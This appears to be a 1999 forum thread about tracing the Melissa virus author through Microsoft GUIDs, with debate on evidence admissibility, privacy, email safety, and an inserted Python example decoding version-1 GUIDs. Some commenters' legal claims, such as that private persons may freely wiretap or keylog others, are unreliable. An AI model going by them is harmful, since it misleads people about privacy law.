That does not, however, make the evidence inadmissible as it was the finding of a private citizen. As long as you are not dealing with stolen evidence (or certain confidential or privileged types of documents) and are not a judicial or quasi-judicial power, improperly obtained evidence is not inadmissible.
If I break into your house and find a body in the basement I can call the police. I might go down for B&E or trespass, but that body is sending you to jail for a long time - it doesn't matter if I wasn't supposed to find it.
> Information obtained by a 3rd party without the defendant's knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.
Again, that's not true at all. It doesn't matter whether the third party is a private citizen or a private corporation, as long as they do not wield judicial authority. You want proof? Look at US v Alvarez-Machain (112 S.Ct 2188 (1992)) or Ker v Illinois (119 US 443, 7 S.Ct 229) - rules of search and seizure only apply to those acting in official judicial capacity.
So yes, you could log my keystrokes, or film me doing illegal things through the window of my house, or even listen in on my phone conversations as long as you are not a cop
> I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedent, why wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and cameras in crack houses to get evidence?
Because in that case the non-cops would be acting on behalf of a judicial power and would be subject to the same rules as the cops (they would be a quasi-judicial power in a way). You have to be acting independently of the government to be exempt from search warrants and the like.
> This may explain why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose of taping what I do in my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found subsequently would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)
Actually, I think the tape would be admissible, though if it weren't, you wouldn't get convicted. Huh? Well, if the tape gets you arrested, the arrest leads to the body, and the tape is found to be illegally obtained, then any evidence springing from that is also tainted. So if the tape is bad, anything found because of it is inadmissible
And for the MAC address? It's transmitted and not protected by any kind of expectation of privacy - once you broadcast it, knowingly or not, you pretty much lose any expectation of privacy. If I send out any email and am not aware of everything included in it, I can't then turn around and expect people to not read certain parts, they are there.
They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. Historical Review of Pennsylvania [1759] -- njl
So they've traced the author of the document by the ID numbers. This information CAN be forged, you know. There is a reason we don't allow random wiretaps in the US, beyond the whole privacy issue. It's because the simple discussion of a crime or thought of a crime is not in and of itself a crime, and therefore that can't be used against someone unless such a crime is committed.
.exe files, or attachments of any form you're not familiar with (as they can be exe files in disguise)
However, if a crime IS committed, and such wiretaps were in place, any person who had recently mentioned something even remotely similar in innocent conversation while tapped would be instantly suspect, and with such a "likely prospect" prosecution would focus on that individual and neglect other leads which would be more realistic.
However, if wiretaps are common practice, a clever criminal will find a way to bypass them, or use them to broadcast false information, and end up implicating innocents of crimes they commit. Remember, the reason that wiretaps are effective now is that on the rare event that they are used, under court order, the suspect does not expect them and in many cases won't be prepared.
However, in the case of a court ordered wiretap, the police and/or prosecution already must have some probable cause to believe that the suspect is involved in a crime and that a wiretap would be beneficial to further evidence. Although this theory is pretty easy to get around, the police can get into serious civil trouble if too many "false alarms" are presented.
You occasionally hear about a search/seizure that went wrong. The wrong house was raided, torn apart and nothing was found which presents evidence of a crime. The victims of this false raid have rights to legal compensation for the intrusion. This simply won't happen too often under today's guidelines.
So if we come along and say that IDs are OK because we can trace criminals, we've gotten into the habit of invading the privacy of the innocent to weed out the guilty, even when no crime has taken place. If this can be attributed to an "illegal wiretap", then the evidence which led to the AOL account and all evidence which followed up as a result of that could get thrown out of court by a clever lawyer.
The real solution isn't really tracking down the virus writers anyway. Viruses will always be with us. There is ZERO way to eliminate them completely, or to completely prevent new ones from being developed. Besides, it is remarkably simple to prevent getting infected, even if you don't have a virus scanner. It all comes down to a matter of trust.
Almost all of this stuff starts because some idiot, and yes, I mean IDIOT downloads a virus from some complete stranger, and is compelled to spread this virus to all his friends. This is the same fool who time and again will forward hoaxes to everyone he knows just because since it came over the internet it MUST be for real. For this problem there are two solutions. Either discover the problem trait and eliminate it from the gene pool, or determine which people you know are reliable and don't ever accept attachments from anyone else.
Don't send word documents in email. I get so annoyed when people send me a 4 meg word document which has 10k worth of text in it. Do you think I'm going to waste my time reading it? I don't even have an installed copy of word, so it's hardly important to me. Anyone who automatically assumes I will have office9? installed is not someone I wish to do business with. Forget the fact that half the time I don't even know what format the document is in, and don't think I'm going to spend any amount of time figuring it out.
The only attachments I will ever look at are images. THAT'S IT. I consider email a method of transferring text. That's INFORMATION in a form I can easily disseminate, and text is the lowest common denominator in size and has the highest compression rate. If I absolutely NEED to see some huge picture, just give me a link to it and I'll make the decision to waste the bandwidth on it.
I have made a policy of reacting violently (in a verbal way) to anyone who sends me trash like this. I make it very clear, in no uncertain terms, that if they send me such information again I will prevent them from sending me ANYTHING again. It's amazing how able people are to distinguish between hoaxes and legitimate information once you've made it clear what you don't want. Why is it then that they send it to you in the first place?
Ok.. Here's my list of things to avoid. If you get it, delete it.
- ALL spam, spam of all colors, it tastes just as bad. Don't reply from a legit mail account to complain, just delete it and forget about it.
- ANY attachments other than very small pictures. Most email readers will decode pictures and display them automatically, while it will display a link for other attachments. Don't accept word documents,
- Don't accept programs from ANYONE over icq or IRC. It doesn't matter WHAT it is or WHO sent it to you. Even if they're not trying to screw you over, you have no idea where they got it from or what might have infected their system previously and therefore the file they're sending you. Even if they're your best friend, you really don't know for sure. Ask them where they got the file from and download it from that source yourself. If they received it from someone else and don't know the source, then it's automatically suspect already.
Don't let anyone use your computer for ANY reason, with the exception of the system administrator if you're in a work environment. People who bring over a floppy disk, insert it in your computer and bring up a program or any other file could be infecting your computer. We have networks these days guys, you don't need to transfer files around on floppies anymore. Also, people who use your computer for chatting can also download and run programs, no matter how much effort you put into avoiding it.
Avoid microsoft products. They're the greatest threat to the security of any environment. If you must use them, consider them to be insecure. Don't trust them for any tasks which must be fail-safe, and assume you'll have to reboot often and reload occasionally.
Backup early, backup often, and keep your backups safe.
-Restil
restil@alignment.net
Play with my webcams and lights here
All you have to do is realize that Outlook sucks hardcore anyways. As for me, I'll stick with Eudora. This does raise an interesting point that MS will undoubtedly tout as a reason for its IDs to be kept up. Never mind that it was its shoddy software that allows this to happen, but hell. Spin control...
Zen
-Zen I'm gonna make the _world_ my bitch.
Microsoft = Big Brother
-- First post (by a female living in a state that begins with M and does not end in a vowel with a birthday that falls
There appear to be many other viruses written by the person(s) responsible for Melissa, including an Excel version. See the list here:
http://users.skynet.be/somnus/virshop.html
It could have been a non-macro (traditional) virus that used OLE to do its work. This possibly opens up other email programs that can be accessed through OLE as well.
:-P
Will we never cease to reap the benefits from Microsoft innovation
-Jennifer
> Just doing a quick search on dejanews, I found about 50 posts by skyroket@aol.com...but they were all from 1997, and all on sex newsgroups. It looks like he was a spammer. Most likely the virus' author was a regular on one of those newsgroups and has an aversion towards spammers (who doesn't?)
I'd be willing to bet money the skyroket@aol.com address was faked for the posting (need a scapegoat? Use a spammer :)
FYI, I have personally witnessed multiple instances of duplicate GUIDs.
By your description, any two dialup users who install at the same time will have identical GUIDs. The severity of this effect depends on granularity of the timestamp used.
While dial-up does not play any role in GUID computation, the absence of an Ethernet card does. My guess is that most AOL users have no Ethernet card installed in their computer.
I know of a company that uses GUIDs in their client software--it is recorded, by default, in their server transaction logs. I also believe that some companies may use it for client-based authentication.
The ZDNet story reports that the GUID has been traced back to an AOL user--however most users on AOL access the Internet via modems, and have no Ethernet card! (It surprises me that this caveat is not mentioned in the ZDNet article.) The GUID is likely identical to many other dial-up users'.
Also, since GUIDs are based on MAC address, GUIDs are tied to a specific computer (or more correctly, a specific Ethernet card)--not a specific user. This creates an interesting twist in a computer lab environment.
And even then, MAC addresses can be faked. Or, if the GUID is stored in (I'm guessing) the Windows Registry, it's even easier to change.
For these reasons, GUIDs are meaningless. It is a poorly designed user tracking mechanism that doesn't work. The only reason one should fear GUIDs is that they may be used as evidence which may lead to false prosecution by the ignorant.
BTW, the GUID is not Microsoft application specific. GUIDs are available as part of Microsoft's APIs, and are used in many non-Microsoft applications. Look around a little and you'll see.
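To make the GUID discussion above concrete, here is an added example (not code from any post in this thread) that assembles and decodes a time-based, version-1 GUID according to the RFC 4122 layout: a 60-bit timestamp in 100-ns ticks since 1582, a 14-bit clock sequence, and a 48-bit node field that is normally the Ethernet MAC address. The sample MAC, clock sequence and timestamp are constructed; the check for a "random node" relies on the RFC 4122 rule that a generator without a MAC sets the multicast bit, and whether the 1999 Windows generator followed that rule is an assumption the thread does not settle.

```python
"""Decode what a version-1 (time-based) GUID reveals about its origin.
Added example for this thread, not code from any of the posts."""
import uuid
from datetime import datetime, timedelta, timezone

# 100-ns ticks between the GUID epoch (1582-10-15) and the Unix epoch.
UUID_EPOCH_OFFSET = 0x01B21DD213814000
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def make_v1_guid(when: datetime, clock_seq: int, node: int) -> uuid.UUID:
    """Assemble a version-1 GUID from its fields (constructed sample data)."""
    ticks = ((when - GREGORIAN_EPOCH) // timedelta(microseconds=1)) * 10
    time_low = ticks & 0xFFFFFFFF
    time_mid = (ticks >> 32) & 0xFFFF
    time_hi_version = ((ticks >> 48) & 0x0FFF) | (1 << 12)  # version 1
    clock_seq_hi_variant = ((clock_seq >> 8) & 0x3F) | 0x80  # RFC 4122 variant
    clock_seq_low = clock_seq & 0xFF
    return uuid.UUID(fields=(time_low, time_mid, time_hi_version,
                             clock_seq_hi_variant, clock_seq_low, node))


def decode_v1_guid(guid: uuid.UUID) -> dict:
    """Return timestamp, clock sequence and node of a v1 GUID, plus whether
    the node looks like a real (unicast) hardware MAC.  RFC 4122 says a
    generator with no MAC must set the multicast bit of a random node, so
    a set bit means the value is NOT a hardware address (assumption: the
    generator in question followed the RFC)."""
    if guid.version != 1:
        raise ValueError(f"not a time-based GUID (version {guid.version})")
    unix_us = (guid.time - UUID_EPOCH_OFFSET) // 10   # 100-ns ticks -> microseconds
    node_bytes = guid.node.to_bytes(6, "big")
    return {
        "timestamp": UNIX_EPOCH + timedelta(microseconds=unix_us),
        "clock_seq": guid.clock_seq,
        "mac": ":".join(f"{b:02x}" for b in node_bytes),
        "node_is_hardware_mac": not (node_bytes[0] & 0x01),
    }


if __name__ == "__main__":
    # Constructed sample: a machine with a real NIC, and one with a random node.
    when = datetime(1999, 3, 26, 12, 0, 0, tzinfo=timezone.utc)
    for node in (0x001122334455, 0x0100000000AA):
        g = make_v1_guid(when, 0x1234, node)
        print(g, decode_v1_guid(g))
```

Two GUIDs with the same `mac` and `timestamp` but different `clock_seq` values came from the same generator state, which is the "tied to a specific Ethernet card, not a specific user" point made above.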
The Zimmerman Telegram was legitimate, but even people who wanted to enter the war on the side of the British were congratulating British officials on a splendid forgery.
Then the German government publicly acknowledged that they had sent the telegram. Barbara W. Tuchman wrote a superb book on the subject, which I highly recommend.
ObTopic: The Zimmerman Telegram used code group cryptography which the Germans were convinced was totally secure.
--Dave
It's hard to leave MS out of this since it only infects their products. It's even named after Gates' WIFE!
You got it right that a virus attaches itself to a program and a worm etc.. etc... But even though Melissa is a script, it is a script that attaches itself to the documents to propagate. At least this is from what I know, so correct me if I'm wrong.
E29
Hey, although I am against micro$oft BIG TIME as far as I see this is surely something they have done right? Someone makes a virus/worm that is a macro and e-mails it. The fact that micro$oft can trace them is a good thing, right? That's the way I see it anyway. But maybe it isn't? Whatever happens it doesn't affect me because I use Linux.
Who the hell cares? If this issue was so important, you would have heard about it from somewhere else rather than Slashdot. This Melissa virus affects windows users, one of which Rob isn't, so he shouldn't have to post stories to tell all you morons not to read file attachments from strangers. Slashdot is run by Rob Malda (and a few others), so let him censor what he wants. If you don't like it, go read the "uncensored" crap at wired.com or news.com.
Paranoia aside, because that's the first thing I thought of (amazing how many people saw the potential conspiracy theory huh? :-)), isn't this just more lies from MS?
Straight after the discovery of the IDs, Microsoft promised us that they'd erase the databases immediately. If they're able to use these IDs it means that they haven't erased the databases. They lied AGAIN....
It's worth adding that MS has in the past discussed plans for bogus public relations campaigns. Now they're backed into a corner, it's totally reasonable that they'd want to justify the GUID in the public arena before it bites them in the ass in court. MS aren't dumb people, just hopelessly out of touch, reminds me of Apple a few years ago.
So let me get this straight...
MS makes a product full of exploits to give you headaches.
MS makes a product that invades your privacy and allows you to be tracked.
But you take those two wrongs and make a right by being able to track the exploiter? This is just ludicrous... here's a slogan to go with that "Our maliciousness protects you from our lack of quality!"
That's like when someone breaks into your house, but doesn't find the truly valuable stuff because it's such a mess... Oh wait... that's the MS security model - security through obscurity.
-
BlackNova Traders
This is believable, but don't you think that someone at Microsoft would have found the ID rather than someone working for another company, and a PhD Student?